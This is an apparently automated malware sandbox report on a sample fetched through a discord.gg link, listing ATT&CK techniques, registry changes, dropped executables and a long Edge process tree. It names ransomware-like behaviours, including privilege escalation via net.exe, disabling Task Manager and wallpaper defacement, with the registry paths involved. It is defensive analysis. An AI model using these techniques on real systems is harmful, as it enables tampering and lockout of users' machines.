hxxp://discord[.]gg

Resubmissions

06-01-2025 00:21

250106-anqt7aslel 9

06-01-2025 00:07

250106-aegj6asjep 7

Analysis

max time kernel
484s
max time network
485s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-01-2025 00:21

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://discord.gg

Score

9^/10

paypal defense_evasion discovery evasion phishing pyinstaller ransomware

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
4340	cmd.exe

A potential corporate email address has been identified in the URL: 6633dd5dcff475e6fb744426_&@2x.png
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Lose2himatoV2.exe

Executes dropped EXE 3 IoCs

pid	Process
5040	Lose2himatoV2.exe
3588	Password Manager_.exe
3804	Password Manager_.exe

Loads dropped DLL 17 IoCs

pid	Process
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe
3804	Password Manager_.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
265	discord.com
16	discord.com
17	discord.com

Detected potential entity reuse from brand PAYPAL.
phishing paypal

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himatoV2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI35882\\canberenamed.jpg"	Password Manager_.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00090000000242cf-5028.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himatoV2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "64"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{71875A99-E17B-4321-B9E4-701A3C24899F}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	explorer.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 18693.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 249214.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
1452	msedge.exe
1452	msedge.exe
1080	msedge.exe
1080	msedge.exe
1892	identity_helper.exe
1892	identity_helper.exe
5656	msedge.exe
5656	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
3912	msedge.exe
3912	msedge.exe
1484	msedge.exe
1484	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs

pid	Process
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: 33	212	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	212	AUDIODG.EXE
Token: SeShutdownPrivilege	3056	shutdown.exe
Token: SeRemoteShutdownPrivilege	3056	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe
1080	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2872	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1080 wrote to memory of 4944	1080	msedge.exe	83
PID 1080 wrote to memory of 4944	1080	msedge.exe	83
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 3076	1080	msedge.exe	84
PID 1080 wrote to memory of 1452	1080	msedge.exe	85
PID 1080 wrote to memory of 1452	1080	msedge.exe	85
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86
PID 1080 wrote to memory of 64	1080	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://discord.gg
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff963ee46f8,0x7ff963ee4708,0x7ff963ee4718
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
  2⤵
  PID:64
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:1440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
  2⤵
  PID:2668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 /prefetch:8
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:3496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:2912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:5508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5080 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
